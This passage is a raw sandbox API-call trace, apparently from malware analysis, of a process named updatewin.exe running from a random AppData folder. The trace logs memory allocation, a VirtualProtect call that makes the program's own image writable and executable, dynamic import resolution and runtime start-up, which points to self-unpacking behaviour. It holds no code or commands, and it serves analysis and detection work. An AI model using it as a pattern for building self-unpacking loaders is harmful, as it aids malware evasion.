lpBuffer="Module32FirstW") returned 0x26 [0082.158] AddAtomA (lpString=0x0) returned 0x0 [0082.158] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.158] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.158] AddAtomA (lpString=0x0) returned 0x0 [0082.158] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.158] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.180] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0082.180] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0082.180] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualProtect") returned 0x76e2435f [0082.181] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualFree") returned 0x76e2186e [0082.181] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersionExA") returned 0x76e23519 [0082.181] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0082.181] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0082.181] GetProcAddress (hModule=0x76e10000, lpProcName="SetErrorMode") returned 0x76e21b00 [0082.181] SetErrorMode (uMode=0x400) returned 0x0 [0082.181] SetErrorMode (uMode=0x0) returned 0x400 [0082.181] GetVersionExA (in: lpVersionInformation=0x18d520*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}5w") | out: lpVersionInformation=0x18d520*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0082.181] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0082.184] VirtualProtect (in: lpAddress=0x400000, dwSize=0x23000, flNewProtect=0x40, lpflOldProtect=0x18e5a8 | out: lpflOldProtect=0x18e5a8*=0x2) returned 1 [0082.814] VirtualFree (lpAddress=0x220000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.815] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76e10000 [0082.815] GetProcAddress (hModule=0x76e10000, lpProcName="FlushFileBuffers") returned 0x76e2469b [0082.815] GetProcAddress (hModule=0x76e10000, lpProcName="HeapReAlloc") returned 0x77361f6e [0082.815] GetProcAddress (hModule=0x76e10000, lpProcName="HeapSize") returned 0x77353002 [0082.815] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcessHeap") returned 0x76e214e9 [0082.816] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringW") returned 0x76e217b9 [0082.816] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleCP") returned 0x76ec7bff [0082.816] GetProcAddress (hModule=0x76e10000, lpProcName="GetStringTypeW") returned 0x76e21946 [0082.816] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileType") returned 0x76e23531 [0082.816] GetProcAddress (hModule=0x76e10000, lpProcName="SetStdHandle") returned 0x76ea454f [0082.816] GetProcAddress (hModule=0x76e10000, lpProcName="FreeEnvironmentStringsW") returned 0x76e251cb [0082.816] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentStringsW") returned 0x76e251e3 [0082.817] GetProcAddress (hModule=0x76e10000, lpProcName="GetCommandLineW") returned 0x76e25223 [0082.817] GetProcAddress (hModule=0x76e10000, lpProcName="GetCommandLineA") returned 0x76e251a1 [0082.817] GetProcAddress (hModule=0x76e10000, lpProcName="GetCPInfo") returned 0x76e25189 [0082.817] GetProcAddress (hModule=0x76e10000, lpProcName="GetOEMCP") returned 0x76e4d1a1 [0082.817] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidCodePage") returned 0x76e24493 [0082.817] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleMode") returned 0x76e21328 [0082.817] GetProcAddress (hModule=0x76e10000, lpProcName="SetFilePointerEx") returned 0x76e3c807 [0082.817] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileW") returned 0x76e23f5c [0082.817] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0082.817] GetProcAddress (hModule=0x76e10000, lpProcName="WriteConsoleW") returned 0x76e47aca [0082.818] GetProcAddress (hModule=0x76e10000, lpProcName="Sleep") returned 0x76e210ff [0082.818] GetProcAddress (hModule=0x76e10000, lpProcName="lstrlenW") returned 0x76e21700 [0082.818] GetProcAddress (hModule=0x76e10000, lpProcName="GetLastError") returned 0x76e211c0 [0082.818] GetProcAddress (hModule=0x76e10000, lpProcName="CreateThread") returned 0x76e234d5 [0082.818] GetProcAddress (hModule=0x76e10000, lpProcName="FindNextFileW") returned 0x76e254ee [0082.818] GetProcAddress (hModule=0x76e10000, lpProcName="UnhandledExceptionFilter") returned 0x76e4772f [0082.818] GetProcAddress (hModule=0x76e10000, lpProcName="SetUnhandledExceptionFilter") returned 0x76e287c9 [0082.818] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcess") returned 0x76e21809 [0082.818] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0082.818] GetProcAddress (hModule=0x76e10000, lpProcName="IsProcessorFeaturePresent") returned 0x76e25235 [0082.819] GetProcAddress (hModule=0x76e10000, lpProcName="QueryPerformanceCounter") returned 0x76e21725 [0082.819] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcessId") returned 0x76e211f8 [0082.819] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentThreadId") returned 0x76e21450 [0082.819] GetProcAddress (hModule=0x76e10000, lpProcName="GetSystemTimeAsFileTime") returned 0x76e23509 [0082.819] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeSListHead") returned 0x773594a4 [0082.819] GetProcAddress (hModule=0x76e10000, lpProcName="IsDebuggerPresent") returned 0x76e24a5d [0082.819] GetProcAddress (hModule=0x76e10000, lpProcName="GetStartupInfoW") returned 0x76e24d40 [0082.819] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleW") returned 0x76e234b0 [0082.819] GetProcAddress (hModule=0x76e10000, lpProcName="RtlUnwind") returned 0x76e4d1c3 [0082.819] GetProcAddress (hModule=0x76e10000, lpProcName="SetLastError") returned 0x76e211a9 [0082.820] GetProcAddress (hModule=0x76e10000, lpProcName="EnterCriticalSection") returned 0x773422b0 [0082.820] GetProcAddress (hModule=0x76e10000, lpProcName="LeaveCriticalSection") returned 0x77342270 [0082.820] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteCriticalSection") returned 0x773545f5 [0082.820] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76e21916 [0082.820] GetProcAddress (hModule=0x76e10000, lpProcName="TlsAlloc") returned 0x76e249ad [0082.820] GetProcAddress (hModule=0x76e10000, lpProcName="TlsGetValue") returned 0x76e211e0 [0082.820] GetProcAddress (hModule=0x76e10000, lpProcName="TlsSetValue") returned 0x76e214fb [0082.820] GetProcAddress (hModule=0x76e10000, lpProcName="TlsFree") returned 0x76e23587 [0082.820] GetProcAddress (hModule=0x76e10000, lpProcName="FreeLibrary") returned 0x76e234c8 [0082.820] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcAddress") returned 0x76e21222 [0082.820] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryExW") returned 0x76e2495d [0082.821] GetProcAddress (hModule=0x76e10000, lpProcName="RaiseException") returned 0x76e258a6 [0082.821] GetProcAddress (hModule=0x76e10000, lpProcName="GetStdHandle") returned 0x76e251b3 [0082.821] GetProcAddress (hModule=0x76e10000, lpProcName="WriteFile") returned 0x76e21282 [0082.821] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameW") returned 0x76e24950 [0082.821] GetProcAddress (hModule=0x76e10000, lpProcName="MultiByteToWideChar") returned 0x76e2192e [0082.821] GetProcAddress (hModule=0x76e10000, lpProcName="WideCharToMultiByte") returned 0x76e2170d [0082.821] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0082.821] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleExW") returned 0x76e24a6f [0082.821] GetProcAddress (hModule=0x76e10000, lpProcName="GetACP") returned 0x76e2179c [0082.821] GetProcAddress (hModule=0x76e10000, lpProcName="HeapAlloc") returned 0x7734e026 [0082.821] GetProcAddress (hModule=0x76e10000, lpProcName="HeapFree") returned 0x76e214c9 [0082.821] GetProcAddress (hModule=0x76e10000, lpProcName="FindClose") returned 0x76e24442 [0082.822] GetProcAddress (hModule=0x76e10000, lpProcName="FindFirstFileExW") returned 0x76e31811 [0082.822] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0082.822] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76780000 [0082.822] GetProcAddress (hModule=0x76780000, lpProcName="GetDesktopWindow") returned 0x767a0a19 [0082.822] GetProcAddress (hModule=0x76780000, lpProcName="InvalidateRect") returned 0x767a1381 [0082.822] GetProcAddress (hModule=0x76780000, lpProcName="wsprintfW") returned 0x767be061 [0082.822] GetProcAddress (hModule=0x76780000, lpProcName="DrawIcon") returned 0x767a8deb [0082.822] GetProcAddress (hModule=0x76780000, lpProcName="FillRect") returned 0x767a0eb6 [0082.822] GetProcAddress (hModule=0x76780000, lpProcName="SendMessageW") returned 0x76799679 [0082.822] GetProcAddress (hModule=0x76780000, lpProcName="GetDlgItem") returned 0x767bf1ba [0082.823] GetProcAddress (hModule=0x76780000, lpProcName="PostQuitMessage") returned 0x76799abb [0082.823] GetProcAddress (hModule=0x76780000, lpProcName="EndPaint") returned 0x767a1341 [0082.823] GetProcAddress (hModule=0x76780000, lpProcName="BeginPaint") returned 0x767a1361 [0082.823] GetProcAddress (hModule=0x76780000, lpProcName="DefWindowProcW") returned 0x773525dd [0082.823] GetProcAddress (hModule=0x76780000, lpProcName="DestroyWindow") returned 0x76799a55 [0082.823] GetProcAddress (hModule=0x76780000, lpProcName="DialogBoxParamW") returned 0x767bcfca [0082.823] GetProcAddress (hModule=0x76780000, lpProcName="MoveWindow") returned 0x767a3698 [0082.823] GetProcAddress (hModule=0x76780000, lpProcName="GetClientRect") returned 0x767a0c62 [0082.823] GetProcAddress (hModule=0x76780000, lpProcName="CreateDialogParamW") returned 0x767c10dc [0082.823] GetProcAddress (hModule=0x76780000, lpProcName="UpdateWindow") returned 0x767a3559 [0082.823] GetProcAddress (hModule=0x76780000, lpProcName="ShowWindow") returned 0x767a0dfb [0082.824] GetProcAddress (hModule=0x76780000, lpProcName="SetWindowPos") returned 0x76798e4e [0082.824] GetProcAddress (hModule=0x76780000, lpProcName="CreateWindowExW") returned 0x76798a29 [0082.824] GetProcAddress (hModule=0x76780000, lpProcName="RegisterClassExW") returned 0x7679b17d [0082.824] GetProcAddress (hModule=0x76780000, lpProcName="LoadCursorW") returned 0x767988f7 [0082.824] GetProcAddress (hModule=0x76780000, lpProcName="DispatchMessageW") returned 0x7679787b [0082.824] GetProcAddress (hModule=0x76780000, lpProcName="TranslateMessage") returned 0x76797809 [0082.824] GetProcAddress (hModule=0x76780000, lpProcName="TranslateAcceleratorW") returned 0x767a1246 [0082.824] GetProcAddress (hModule=0x76780000, lpProcName="GetMessageW") returned 0x767978e2 [0082.824] GetProcAddress (hModule=0x76780000, lpProcName="LoadAcceleratorsW") returned 0x767a4dd6 [0082.824] GetProcAddress (hModule=0x76780000, lpProcName="LoadStringW") returned 0x76798eb9 [0082.824] GetProcAddress (hModule=0x76780000, lpProcName="LoadIconW") returned 0x7679b142 [0082.825] GetProcAddress (hModule=0x76780000, lpProcName="GetMonitorInfoW") returned 0x767a3000 [0082.825] GetProcAddress (hModule=0x76780000, lpProcName="MonitorFromWindow") returned 0x767a3150 [0082.825] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x752d0000 [0082.825] GetProcAddress (hModule=0x752d0000, lpProcName="TextOutW") returned 0x752ed41c [0082.825] GetProcAddress (hModule=0x752d0000, lpProcName="SetBkMode") returned 0x752e51a2 [0082.825] GetProcAddress (hModule=0x752d0000, lpProcName="SelectObject") returned 0x752e4f70 [0082.825] GetProcAddress (hModule=0x752d0000, lpProcName="CreateFontW") returned 0x752eb600 [0082.825] GetProcAddress (hModule=0x752d0000, lpProcName="DeleteObject") returned 0x752e5689 [0082.826] GetProcAddress (hModule=0x752d0000, lpProcName="CreateSolidBrush") returned 0x752e4f17 [0082.826] GetProcAddress (hModule=0x752d0000, lpProcName="SetTextAlign") returned 0x752e8401 [0082.826] LoadLibraryA (lpLibFileName="COMCTL32.dll") returned 0x741f0000 [0082.971] GetProcAddress (hModule=0x741f0000, lpProcName="InitCommonControlsEx") returned 0x742109ce [0082.971] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x74510000 [0082.974] GetProcAddress (hModule=0x74510000, lpProcName="timeGetTime") returned 0x745126e0 [0082.974] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x74390000 [0082.978] GetProcAddress (hModule=0x74390000, lpProcName="atexit") returned 0x743ac544 [0082.978] atexit (param_1=0x6163c8) returned 0 [0082.979] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18e5ac | out: lpSystemTimeAsFileTime=0x18e5ac*(dwLowDateTime=0x9d886260, dwHighDateTime=0x1d5d6b4)) [0082.980] GetCurrentThreadId () returned 0x7d8 [0082.980] GetCurrentProcessId () returned 0x778 [0082.980] QueryPerformanceCounter (in: lpPerformanceCount=0x18e5a4 | out: lpPerformanceCount=0x18e5a4*=22342319534) returned 1 [0083.096] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0083.096] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0083.096] GetLastError () returned 0x57 [0083.097] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0083.097] GetLastError () returned 0x57 [0083.097] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76e10000 [0083.097] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionEx") returned 0x76e24d28 [0083.098] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0083.098] GetLastError () returned 0x57 [0083.098] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0083.098] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0083.100] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0083.100] GetLastError () returned 0x57 [0083.101] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0083.101] GetLastError () returned 0x57 [0083.101] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76e10000 [0083.101] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionEx") returned 0x76e24d28 [0083.102] GetProcessHeap () returned 0x600000 [0083.102] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0083.102] GetLastError () returned 0x57 [0083.102] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0083.102] GetLastError () returned 0x57 [0083.103] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0083.103] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x364) returned 0x62b9c0 [0083.103] SetLastError (dwErrCode=0x57) [0083.103] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0xc00) returned 0x62bd30 [0083.106] GetStartupInfoW (in: lpStartupInfo=0x18e4e0 | out: lpStartupInfo=0x18e4e0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x402400, hStdOutput=0xafb0cfc3, hStdError=0xfffffffe)) [0083.106] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0083.106] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0083.107] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0083.107] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin.exe\" " [0083.107] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin.exe\" " [0083.107] IsValidCodePage (CodePage=0x4e4) returned 1 [0083.107] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18e500 | out: lpCPInfo=0x18e500) returned 1 [0083.107] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ddc8 | out: lpCPInfo=0x18ddc8) returned 1 [0083.107] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e3dc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0083.107] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e3dc, cbMultiByte=256, lpWideCharStr=0x18db68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0083.107] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18dddc | out: lpCharType=0x18dddc) returned 1 [0083.108] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e3dc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0083.108] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e3dc, cbMultiByte=256, lpWideCharStr=0x18db18, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ謇@Ā") returned 256 [0083.108] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0083.108] GetLastError () returned 0x57 [0083.109] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringEx") returned 0x76ea47f1 [0083.109] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ謇@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0083.109] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ謇@Ā", cchSrc=256, lpDestStr=0x18d908, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0083.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18e2dc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x8b\x08é¯\x18å\x18", lpUsedDefaultChar=0x0) returned 256 [0083.109] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e3dc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0083.109] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e3dc, cbMultiByte=256, lpWideCharStr=0x18db38, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0083.109] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0083.109] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 